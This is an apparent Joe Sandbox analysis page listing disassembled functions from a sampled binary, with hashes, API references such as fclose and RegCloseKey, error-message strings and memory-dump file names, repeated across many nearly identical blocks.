Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 2de48659fd9b2c34c1948959248849a86e1d1f026478772961e51901de17ae7d
Instruction ID: edea892eed85c3aa73837bb9288ca25a90f550bf0ef495c73371c9603cfb2e4f
Opcode Fuzzy Hash: 2de48659fd9b2c34c1948959248849a86e1d1f026478772961e51901de17ae7d
Instruction Fuzzy Hash: 31F05EE3F1861341F953BA48BC40FBD96522F453B8EC90531CD4A0E6D9AF3DA8C68320

Function 00007FF70CAD526C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF70CAD5520

Strings

fs_file_read, xrefs: 00007FF70CAD5555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF70CAD555C

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: b94846aad9ffa0726e945d6b0138e66da3c64d41ba801becf53d91a158c5c2cb
Instruction ID: df86253267b4352bd481ded57288674701e48d15a90376b4d0ac9bce17ea870b
Opcode Fuzzy Hash: b94846aad9ffa0726e945d6b0138e66da3c64d41ba801becf53d91a158c5c2cb
Instruction Fuzzy Hash: 8BF03AE3E1861241E953BA48B841BB996522F453A8E890531CD4A0A6D9AF3DA8868220

Function 00007FF70CAD5262 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF70CAD5520

Strings

fs_file_read, xrefs: 00007FF70CAD5555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF70CAD555C

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: ca2303c8a4d4cd9f025dfdbcdf9563922afb20b95d5d53455a79939f79b2ee4b
Instruction ID: cfdf1f16a7ac7219ca7e532a12c07b09e938049fbbe791067380b435343c6f3c
Opcode Fuzzy Hash: ca2303c8a4d4cd9f025dfdbcdf9563922afb20b95d5d53455a79939f79b2ee4b
Instruction Fuzzy Hash: 8AF05EE3F1861741F953BA48BC40FBD96522F453B9EC90531CD4A0E6D9AF3DA8C68320

Function 00007FF70CAD5258 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF70CAD5520

Strings

fs_file_read, xrefs: 00007FF70CAD5555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF70CAD555C

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: f7bf2250f83dda7b4050d48382f9d255a3ae4d373fcc780de3b5441e2bb50831
Instruction ID: cf50a52bd8daeb98cf876d2080b421ac7aa0fe7ef3829162d273264ce4e04c98
Opcode Fuzzy Hash: f7bf2250f83dda7b4050d48382f9d255a3ae4d373fcc780de3b5441e2bb50831
Instruction Fuzzy Hash: 9BF05EE3F1861341F953BA48BC40FBD96522F453B8EC90531CD4A0E6D9AF3DA8C68320

Function 00007FF70CAD5396 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF70CAD5520

Strings

fs_file_read, xrefs: 00007FF70CAD5555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF70CAD555C

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 843c9d37efa13bae1efb7b07b9526f3bc61a19142bbcf8b7984d1d8eaec669d5
Instruction ID: fe1f65c14c238ad030f72f028383c6bfad048c5a9a49d45c8c03a9ab6b157174
Opcode Fuzzy Hash: 843c9d37efa13bae1efb7b07b9526f3bc61a19142bbcf8b7984d1d8eaec669d5
Instruction Fuzzy Hash: D4F05EE3F1861341F953BA48BC40FBD96522F453B8EC90532CD4A0E6D9AF3DA8C68320

Function 00007FF70CAD538C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF70CAD5520

Strings

fs_file_read, xrefs: 00007FF70CAD5555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF70CAD555C

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 2de48659fd9b2c34c1948959248849a86e1d1f026478772961e51901de17ae7d
Instruction ID: edea892eed85c3aa73837bb9288ca25a90f550bf0ef495c73371c9603cfb2e4f
Opcode Fuzzy Hash: 2de48659fd9b2c34c1948959248849a86e1d1f026478772961e51901de17ae7d
Instruction Fuzzy Hash: 31F05EE3F1861341F953BA48BC40FBD96522F453B8EC90531CD4A0E6D9AF3DA8C68320

Function 00007FF70CAD5382 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF70CAD5520

Strings

fs_file_read, xrefs: 00007FF70CAD5555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF70CAD555C

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: b94846aad9ffa0726e945d6b0138e66da3c64d41ba801becf53d91a158c5c2cb
Instruction ID: df86253267b4352bd481ded57288674701e48d15a90376b4d0ac9bce17ea870b
Opcode Fuzzy Hash: b94846aad9ffa0726e945d6b0138e66da3c64d41ba801becf53d91a158c5c2cb
Instruction Fuzzy Hash: 8BF03AE3E1861241E953BA48B841BB996522F453A8E890531CD4A0A6D9AF3DA8868220

Function 00007FF70CAD5378 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF70CAD5520

Strings

fs_file_read, xrefs: 00007FF70CAD5555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF70CAD555C

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: ca2303c8a4d4cd9f025dfdbcdf9563922afb20b95d5d53455a79939f79b2ee4b
Instruction ID: cfdf1f16a7ac7219ca7e532a12c07b09e938049fbbe791067380b435343c6f3c
Opcode Fuzzy Hash: ca2303c8a4d4cd9f025dfdbcdf9563922afb20b95d5d53455a79939f79b2ee4b
Instruction Fuzzy Hash: 8AF05EE3F1861741F953BA48BC40FBD96522F453B9EC90531CD4A0E6D9AF3DA8C68320

Function 00007FF70CAD536E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF70CAD5520

Strings

fs_file_read, xrefs: 00007FF70CAD5555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF70CAD555C

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: f7bf2250f83dda7b4050d48382f9d255a3ae4d373fcc780de3b5441e2bb50831
Instruction ID: cf50a52bd8daeb98cf876d2080b421ac7aa0fe7ef3829162d273264ce4e04c98
Opcode Fuzzy Hash: f7bf2250f83dda7b4050d48382f9d255a3ae4d373fcc780de3b5441e2bb50831
Instruction Fuzzy Hash: 9BF05EE3F1861341F953BA48BC40FBD96522F453B8EC90531CD4A0E6D9AF3DA8C68320

Function 00007FF70CAD550C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF70CAD5520

Strings

fs_file_read, xrefs: 00007FF70CAD5555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF70CAD555C

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: ae85d74ad03701d99a47d3b1f8a3a69ee898c65ee74bc562a5c34de23c39dca6
Instruction ID: 18147115ffd0d6aa4155448b683403e5b05aa8e5a269ff54b94754b0fe82d52d
Opcode Fuzzy Hash: ae85d74ad03701d99a47d3b1f8a3a69ee898c65ee74bc562a5c34de23c39dca6
Instruction Fuzzy Hash: ACF05EE3F1861341F953BA48BC40FBD96522F453B8EC90532CD4A0E6D9AF3DA9C68320

Function 00007FF70CAD5505 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF70CAD5520

Strings

fs_file_read, xrefs: 00007FF70CAD5555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF70CAD555C

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: ae85d74ad03701d99a47d3b1f8a3a69ee898c65ee74bc562a5c34de23c39dca6
Instruction ID: 18147115ffd0d6aa4155448b683403e5b05aa8e5a269ff54b94754b0fe82d52d
Opcode Fuzzy Hash: ae85d74ad03701d99a47d3b1f8a3a69ee898c65ee74bc562a5c34de23c39dca6
Instruction Fuzzy Hash: ACF05EE3F1861341F953BA48BC40FBD96522F453B8EC90532CD4A0E6D9AF3DA9C68320

Function 00007FF70CAD54FE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF70CAD5520

Strings

fs_file_read, xrefs: 00007FF70CAD5555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF70CAD555C

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: ae85d74ad03701d99a47d3b1f8a3a69ee898c65ee74bc562a5c34de23c39dca6
Instruction ID: 18147115ffd0d6aa4155448b683403e5b05aa8e5a269ff54b94754b0fe82d52d
Opcode Fuzzy Hash: ae85d74ad03701d99a47d3b1f8a3a69ee898c65ee74bc562a5c34de23c39dca6
Instruction Fuzzy Hash: ACF05EE3F1861341F953BA48BC40FBD96522F453B8EC90532CD4A0E6D9AF3DA9C68320

Function 00007FFDA55A54C8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFDA55A545D

Part of subcall function 00007FFDA55AC852: fwrite.MSVCRT ref: 00007FFDA55AC8FE
Part of subcall function 00007FFDA55AC852: fflush.MSVCRT ref: 00007FFDA55AC90A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFDA55A54AD
registry_get_value, xrefs: 00007FFDA55A54A6

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 44a2947c2810745d01f8211b4376d8c13ba4dfe3177a58a20cd48993161b93f4
Instruction ID: e8ee5fcb3e825379daa7fc6eb3216b64b72d1851db55524c31a2796ccae8cc8f
Opcode Fuzzy Hash: 44a2947c2810745d01f8211b4376d8c13ba4dfe3177a58a20cd48993161b93f4
Instruction Fuzzy Hash: 26F0F66670A74E52EA538F00F8587792254BF42BA4F080236EE5D477D2EF3ED9899308

Function 00007FFDA55A53B7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFDA55A545D

Part of subcall function 00007FFDA55AC852: fwrite.MSVCRT ref: 00007FFDA55AC8FE
Part of subcall function 00007FFDA55AC852: fflush.MSVCRT ref: 00007FFDA55AC90A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFDA55A54AD
registry_get_value, xrefs: 00007FFDA55A54A6

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 6910d879578be204291e0ac69aa017fcdff08f4ac4e3167abbe6aae66f0fe57f
Instruction ID: 1738afd61a255a34af941dc2a059de77f170ba4da30f0f663046f9766e37d3e5
Opcode Fuzzy Hash: 6910d879578be204291e0ac69aa017fcdff08f4ac4e3167abbe6aae66f0fe57f
Instruction Fuzzy Hash: 71F0F66670A64E52E9538F00FC587792254BF42BA4F080236EE1D473D2EF3ED9899308

Function 00007FFDA55A53AD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFDA55A545D

Part of subcall function 00007FFDA55AC852: fwrite.MSVCRT ref: 00007FFDA55AC8FE
Part of subcall function 00007FFDA55AC852: fflush.MSVCRT ref: 00007FFDA55AC90A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFDA55A54AD
registry_get_value, xrefs: 00007FFDA55A54A6

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: aa48802192c854cc546cfbcb6e554b8a9b3086c09c062a5397e6ab46ec809a05
Instruction ID: 4cea3cf1b8982bfc733fe05fc0e4d91fa4ddeb4fe963e4cdd387a7fcb1ba78a0
Opcode Fuzzy Hash: aa48802192c854cc546cfbcb6e554b8a9b3086c09c062a5397e6ab46ec809a05
Instruction Fuzzy Hash: 53F0F66670A74E52E9538F00B8687792254BF42BA5F080236EE1D473D2EF3ED9899308

Function 00007FFDA55A544C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFDA55A545D

Part of subcall function 00007FFDA55AC852: fwrite.MSVCRT ref: 00007FFDA55AC8FE
Part of subcall function 00007FFDA55AC852: fflush.MSVCRT ref: 00007FFDA55AC90A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFDA55A54AD
registry_get_value, xrefs: 00007FFDA55A54A6

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: bca688cdaa0b7501fed483a5b10b6253b738036845691a3789c10daad3c74d0d
Instruction ID: 706394daf772d9f544b41ead4f7ef42e82cac02566db3bd68d08d8ea03b40322
Opcode Fuzzy Hash: bca688cdaa0b7501fed483a5b10b6253b738036845691a3789c10daad3c74d0d
Instruction Fuzzy Hash: EEF0F66670A64E52E9538F00B8587796254BF42BA4F080236EE1D477D2EF3ED9899308

Function 00007FFDA55A543E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFDA55A545D

Part of subcall function 00007FFDA55AC852: fwrite.MSVCRT ref: 00007FFDA55AC8FE
Part of subcall function 00007FFDA55AC852: fflush.MSVCRT ref: 00007FFDA55AC90A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFDA55A54AD
registry_get_value, xrefs: 00007FFDA55A54A6

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 022898d8f5bd0615f91a07a972d7260e261b4f7e707cc9481ed84de0cfb1a0b9
Instruction ID: fe377abb4b25d9c6f62909e4f232becfbd8497a0fec4be96d56f84d66a428ffb
Opcode Fuzzy Hash: 022898d8f5bd0615f91a07a972d7260e261b4f7e707cc9481ed84de0cfb1a0b9
Instruction Fuzzy Hash: 87F0FC6670A64E51E9538F00BC587752254BF42B94F080136DE1D473D2EF3DD9459304

Function 00007FFDA55D35A7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFDA55D364D

Part of subcall function 00007FFDA55D9DC2: fwrite.MSVCRT ref: 00007FFDA55D9E6E
Part of subcall function 00007FFDA55D9DC2: fflush.MSVCRT ref: 00007FFDA55D9E7A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFDA55D369D
registry_get_value, xrefs: 00007FFDA55D3696
